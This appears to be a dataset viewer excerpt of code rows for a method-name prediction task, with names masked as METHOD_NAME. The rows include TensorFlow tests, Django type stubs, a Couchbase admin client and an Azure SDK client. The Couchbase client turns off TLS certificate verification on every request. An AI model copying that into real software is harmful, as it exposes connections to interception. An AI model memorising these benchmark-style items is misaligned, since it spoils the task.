model.fit([input_a_np, input_b_np], output_np, epochs=5)
def test_linear_model_with_sparse_input(self):
indices = constant_op.constant([[0, 0], [0, 2], [1, 0], [1, 1]],
dtype=dtypes.int64)
values = constant_op.constant([.4, .6, .8, .5])
shape = constant_op.constant([2, 3], dtype=dtypes.int64)
model = linear.LinearModel()
inp = sparse_tensor.SparseTensor(indices, values, shape)
output = model(inp)
self.evaluate(variables.global_variables_initializer())
if context.executing_eagerly():
weights = model.get_weights()
weights[0] = np.ones((3, 1))
model.set_weights(weights)
output = model(inp)
self.assertAllClose([[1.], [1.3]], self.evaluate(output))
def test_linear_model_with_sparse_input_and_custom_training(self):
batch_size = 64
indices = []
values = []
target = np.zeros((batch_size, 1))
with context.eager_mode():
for i in range(64):
rand_int = np.random.randint(3)
if rand_int == 0:
indices.append((i, 0))
val = np.random.uniform(low=-5, high=5)
values.append(val)
target[i] = 0.3 * val
elif rand_int == 1:
indices.append((i, 1))
val = np.random.uniform(low=-5, high=5)
values.append(val)
target[i] = 0.2 * val
else:
indices.append((i, 0))
indices.append((i, 1))
val_1 = np.random.uniform(low=-5, high=5)
val_2 = np.random.uniform(low=-5, high=5)
values.append(val_1)
values.append(val_2)
target[i] = 0.3 * val_1 + 0.2 * val_2
indices = np.asarray(indices)
values = np.asarray(values)
shape = constant_op.constant([batch_size, 2], dtype=dtypes.int64)
inp = sparse_tensor.SparseTensor(indices, values, shape)
model = linear.LinearModel(use_bias=False)
opt = gradient_descent.SGD()
for _ in range(20):
with backprop.GradientTape() as t:
output = model(inp)
loss = backend.mean(losses.mean_squared_error(target, output))
grads = t.gradient(loss, model.trainable_variables)
grads_and_vars = zip(grads, model.trainable_variables)
opt.apply_gradients(grads_and_vars)
# This test is an example for a regression on categorical inputs, i.e.,
# the output is 0.4, 0.6, 0.9 when input is 'alpha', 'beta', 'gamma'
# separately.
def test_linear_model_with_feature_column(self):
with context.eager_mode():
vocab_list = ['alpha', 'beta', 'gamma']
vocab_val = [0.4, 0.6, 0.9]
data = np.random.choice(vocab_list, size=256)
y = np.zeros_like(data, dtype=np.float32)
for vocab, val in zip(vocab_list, vocab_val):
indices = np.where(data == vocab)
y[indices] = val + np.random.uniform(
low=-0.01, high=0.01, size=indices[0].shape)
cat_column = fc.categorical_column_with_vocabulary_list(
key='symbol', vocabulary_list=vocab_list)
ind_column = fc.indicator_column(cat_column)
dense_feature_layer = dense_features_v2.DenseFeatures([ind_column])
linear_model = linear.LinearModel(
use_bias=False, kernel_initializer='zeros')
combined = sequential.Sequential([dense_feature_layer, linear_model])
opt = gradient_descent.SGD(learning_rate=0.1)
combined.compile(opt, 'mse', [])
combined.fit(x={'symbol': data}, y=y, batch_size=32, epochs=10)
self.assertAllClose([[0.4], [0.6], [0.9]],
combined.layers[1].dense_layers[0].kernel.numpy(),
atol=0.01)
def test_config(self):
linear_model = linear.LinearModel(units=3, use_bias=True)
config = linear_model.get_config()
cloned_linear_model = linear.LinearModel.from_config(config)
self.assertEqual(linear_model.units, cloned_linear_model.units)
if __name__ == '__main__':
test.main() |
298,497 | combine duration expression | import json
from collections.abc import Iterable, Sequence
from datetime import date, time, timedelta
from datetime import datetime as real_datetime
from decimal import Decimal
from typing import Any
from django.core.management.color import Style
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.utils import CursorWrapper
from django.db.models.base import Model
from django.db.models.constants import OnConflict
from django.db.models.expressions import Case, Expression
from django.db.models.fields import Field
from django.db.models.sql.compiler import SQLCompiler
class BaseDatabaseOperations:
compiler_module: str
integer_field_ranges: dict[str, tuple[int, int]]
set_operators: dict[str, str]
cast_data_types: dict[Any, Any]
cast_char_field_without_max_length: Any
PRECEDING: str
FOLLOWING: str
UNBOUNDED_PRECEDING: str
UNBOUNDED_FOLLOWING: str
CURRENT_ROW: str
explain_prefix: str | None
connection: BaseDatabaseWrapper
def __init__(self, connection: BaseDatabaseWrapper) -> None: ...
def autoinc_sql(self, table: str, column: str) -> str | None: ...
def bulk_batch_size(self, fields: Any, objs: Any) -> int: ...
def cache_key_culling_sql(self) -> str: ...
def unification_cast_sql(self, output_field: Field) -> str: ...
def date_extract_sql(self, lookup_type: str, sql: Any, params: Any) -> tuple[str, Any]: ...
# def date_interval_sql(self, timedelta: None) -> Any: ...
def date_trunc_sql(self, lookup_type: str, sql: str, params: Any, tzname: str | None = ...) -> tuple[str, Any]: ...
def datetime_cast_date_sql(self, sql: str, params: Any, tzname: str | None) -> tuple[str, Any]: ...
def datetime_cast_time_sql(self, sql: str, params: Any, tzname: str | None) -> tuple[str, Any]: ...
def datetime_extract_sql(self, lookup_type: str, sql: str, params: Any, tzname: str | None) -> tuple[str, Any]: ...
def datetime_trunc_sql(self, lookup_type: str, sql: str, params: Any, tzname: str | None) -> str: ...
def time_trunc_sql(self, lookup_type: str, sql: str, params: Any, tzname: str | None = ...) -> str: ...
def time_extract_sql(self, lookup_type: str, sql: str, params: Any) -> str: ...
def deferrable_sql(self) -> str: ...
def distinct_sql(self, fields: list[str], params: list[Any] | None) -> tuple[list[str], list[str]]: ...
def fetch_returned_insert_columns(self, cursor: Any, returning_params: Any) -> Any: ...
def field_cast_sql(self, db_type: str | None, internal_type: str) -> str: ...
def force_no_ordering(self) -> list[Any]: ...
def for_update_sql(self, nowait: bool = ..., skip_locked: bool = ..., of: Any = ..., no_key: bool = ...) -> str: ...
def limit_offset_sql(self, low_mark: int, high_mark: int | None) -> str: ...
def last_executed_query(self, cursor: Any, sql: Any, params: Any) -> str: ...
def last_insert_id(self, cursor: CursorWrapper, table_name: str, pk_name: str) -> int: ...
def lookup_cast(self, lookup_type: str, internal_type: str | None = ...) -> str: ...
def max_in_list_size(self) -> int | None: ...
def max_name_length(self) -> int | None: ...
def no_limit_value(self) -> str | None: ...
def pk_default_value(self) -> str: ...
def prepare_sql_script(self, sql: Any) -> list[str]: ...
def process_clob(self, value: str) -> str: ...
def return_insert_columns(self, fields: Any) -> Any: ...
def compiler(self, compiler_name: str) -> type[SQLCompiler]: ...
def quote_name(self, name: str) -> str: ...
def regex_lookup(self, lookup_type: str) -> str: ...
def savepoint_create_sql(self, sid: str) -> str: ...
def savepoint_commit_sql(self, sid: str) -> str: ...
def savepoint_rollback_sql(self, sid: str) -> str: ...
def set_time_zone_sql(self) -> str: ...
def sql_flush(
self, style: Any, tables: Sequence[str], *, reset_sequences: bool = ..., allow_cascade: bool = ...
) -> list[str]: ...
def execute_sql_flush(self, sql_list: Iterable[str]) -> None: ...
def sequence_reset_by_name_sql(self, style: Style | None, sequences: list[Any]) -> list[Any]: ...
def sequence_reset_sql(self, style: Style, model_list: Sequence[type[Model]]) -> list[Any]: ...
def start_transaction_sql(self) -> str: ...
def end_transaction_sql(self, success: bool = ...) -> str: ...
def tablespace_sql(self, tablespace: str | None, inline: bool = ...) -> str: ...
def prep_for_like_query(self, x: str) -> str: ...
prep_for_iexact_query: Any
def validate_autopk_value(self, value: int) -> int: ...
def adapt_unknown_value(self, value: Any) -> Any: ...
def adapt_datefield_value(self, value: date | None) -> str | None: ...
def adapt_datetimefield_value(self, value: real_datetime | None) -> str | None: ...
def adapt_timefield_value(self, value: real_datetime | time | None) -> str | None: ...
def adapt_decimalfield_value(
self, value: Decimal | None, max_digits: int | None = ..., decimal_places: int | None = ...
) -> str | None: ...
def adapt_ipaddressfield_value(self, value: str | None) -> str | None: ...
def adapt_json_value(self, value: Any, encoder: type[json.JSONEncoder] | None) -> str: ...
def adapt_integerfield_value(self, value: Any, internal_type: Any) -> Any: ...
def year_lookup_bounds_for_date_field(self, value: int, iso_year: bool = ...) -> list[str]: ...
def year_lookup_bounds_for_datetime_field(self, value: int, iso_year: bool = ...) -> list[str]: ...
def get_db_converters(self, expression: Expression) -> list[Any]: ...
def convert_durationfield_value(
self, value: float | None, expression: Expression, connection: BaseDatabaseWrapper
) -> timedelta | None: ...
def check_expression_support(self, expression: Any) -> None: ...
def conditional_expression_supported_in_where_clause(self, expression: Any) -> bool: ...
def combine_expression(self, connector: str, sub_expressions: list[str]) -> str: ...
def METHOD_NAME(self, connector: Any, sub_expressions: Any) -> str: ...
def binary_placeholder_sql(self, value: Case | None) -> str: ...
def modify_insert_params(self, placeholder: str, params: Any) -> Any: ...
def integer_field_range(self, internal_type: Any) -> tuple[int, int]: ...
def subtract_temporals(self, internal_type: Any, lhs: Any, rhs: Any) -> tuple[str, tuple[Any, ...]]: ...
def window_frame_start(self, start: Any) -> str: ...
def window_frame_end(self, end: Any) -> str: ...
def window_frame_rows_start_end(self, start: int | None = ..., end: int | None = ...) -> tuple[str, str]: ...
def window_frame_range_start_end(self, start: int | None = ..., end: int | None = ...) -> tuple[str, str]: ...
def explain_query_prefix(self, format: str | None = ..., **options: Any) -> str: ...
def insert_statement(self, on_conflict: OnConflict | None = ...) -> str: ...
def on_conflict_suffix_sql(
self, fields: Any, on_conflict: Any, update_fields: Any, unique_fields: Any
) -> str | Any: ...
def format_for_duration_arithmetic(self, sql: str) -> str: ... |
298,498 | add bucket | import os
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from requests.auth import HTTPBasicAuth
from setup_app.utils.base import logIt
try:
requests.packages.urllib3.disable_warnings()
except:
pass
class FakeResult:
ok = False
reason = ''
text = ''
def json(self):
return {'error': True}
class CBM:
def __init__(self, host, admin, password, port=18091, n1qlport=18093):
self.host = host
self.port = port
self.n1qlport = n1qlport
self.auth = HTTPBasicAuth(admin, password)
self.set_api_root()
def set_api_root(self):
self.api_root = 'https://{}:{}/'.format(self.host, self.port)
self.n1ql_api = 'https://{}:{}/query/service'.format(self.host, self.n1qlport)
def _get(self, endpoint):
api = os.path.join(self.api_root, endpoint)
try:
result = requests.get(api, auth=self.auth, verify=False)
except Exception as e:
result = FakeResult()
result.reason = 'Connection failed. Reason: ' + str(e)
self.logIfError(result)
return result
def _delete(self, endpoint):
api = os.path.join(self.api_root, endpoint)
result = requests.delete(api, auth=self.auth, verify=False)
self.logIfError(result)
return result
def _post(self, endpoint, data):
url = os.path.join(self.api_root, endpoint)
result = requests.post(url, data=data, auth=self.auth, verify=False)
self.logIfError(result)
return result
def _put(self, endpoint, data):
url = os.path.join(self.api_root, endpoint)
result = requests.put(url, data=data, auth=self.auth, verify=False)
self.logIfError(result)
return result
def get_system_info(self):
result = self._get('pools/default')
if result.ok:
return result.json()
return {}
def get_buckets(self):
return self._get('pools/default/buckets')
def delete_bucket(self, bucket_name):
return self._delete('pools/default/buckets/'+bucket_name)
def METHOD_NAME(self, bucket_name, ram_quota, bucket_type='couchbase'):
data = {
'name': bucket_name,
'bucketType': bucket_type,
'ramQuotaMB': ram_quota,
'authType': 'sasl',
}
return self._post('pools/default/buckets', data)
def get_certificate(self):
result = self._get('pools/default/certificate')
if result.ok:
return result.text
return ''
def exec_query(self, query):
logIt("Executing n1ql {}".format(query))
data = {'statement': query}
result = requests.post(self.n1ql_api, data=data, auth=self.auth, verify=False)
self.logIfError(result)
return result
def test_connection(self):
result = self._get('pools/')
return result
def initialize_node(self, path='/opt/couchbase/var/lib/couchbase/data',
index_path='/opt/couchbase/var/lib/couchbase/data'):
data = {'path':path, 'index_path':index_path}
result = self._post('nodes/self/controller/settings', data)
return result
def rename_node(self, hostname='127.0.0.1'):
data = {'hostname': hostname}
try:
result = self._post('node/controller/rename', data)
except Exception as e:
result = FakeResult()
result.reason = 'Node rename failed. Reason: ' + str(e)
return result
def set_index_storage_mode(self, mode='plasma'):
data = {'storageMode': mode}
result = self._post('settings/indexes', data)
return result
def set_index_memory_quta(self, ram_quota=256):
data = {'indexMemoryQuota': ram_quota}
result = self._post('pools/default', data)
return result
def setup_services(self, services=['kv','n1ql','index']):
data = {'services': ','.join(services)}
result = self._post('node/controller/setupServices', data)
return result
def get_services(self):
result = self._get('pools/default/nodeServices')
return result
def set_admin_password(self):
data = {
'password': self.auth.password,
'username': self.auth.username,
'port': 'SAME',
}
result = self._post('settings/web', data)
return result
def create_user(self, username, password, fullname, roles):
data = {
'name': fullname,
'password': password,
'roles': roles,
}
result = self._put('settings/rbac/users/local/'+username, data)
return result
def whoami(self):
result = self._get('whoami')
return result.json()
def logIfError(self, result):
try:
js = result.json()
if 'errors' in js:
msg = "Error executing query: {}".format(', '.join([err['msg'] for err in js['errors']]))
logIt(msg)
logIt(msg, True)
else:
logIt("Query Result: {}".format(str(js)))
except:
pass
|
298,499 | close | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import AppPlatformManagementClientConfiguration
from .operations import ServicesOperations
from .operations import AppsOperations
from .operations import BindingsOperations
from .operations import CertificatesOperations
from .operations import CustomDomainsOperations
from .operations import DeploymentsOperations
from .operations import Operations
from .operations import RuntimeVersionsOperations
from .operations import SkuOperations
from .. import models
class AppPlatformManagementClient(object):
"""REST API for Azure Spring Cloud.
:ivar services: ServicesOperations operations
:vartype services: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.ServicesOperations
:ivar apps: AppsOperations operations
:vartype apps: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.AppsOperations
:ivar bindings: BindingsOperations operations
:vartype bindings: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.BindingsOperations
:ivar certificates: CertificatesOperations operations
:vartype certificates: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.CertificatesOperations
:ivar custom_domains: CustomDomainsOperations operations
:vartype custom_domains: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.CustomDomainsOperations
:ivar deployments: DeploymentsOperations operations
:vartype deployments: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.DeploymentsOperations
:ivar operations: Operations operations
:vartype operations: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.Operations
:ivar runtime_versions: RuntimeVersionsOperations operations
:vartype runtime_versions: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.RuntimeVersionsOperations
:ivar sku: SkuOperations operations
:vartype sku: azure.mgmt.appplatform.v2019_05_01_preview.aio.operations.SkuOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Gets subscription ID which uniquely identify the Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = AppPlatformManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.services = ServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.apps = AppsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.bindings = BindingsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.certificates = CertificatesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.custom_domains = CustomDomainsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.deployments = DeploymentsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.runtime_versions = RuntimeVersionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.sku = SkuOperations(
self._client, self._config, self._serialize, self._deserialize)
async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
async def METHOD_NAME(self) -> None:
await self._client.METHOD_NAME()
async def __aenter__(self) -> "AppPlatformManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.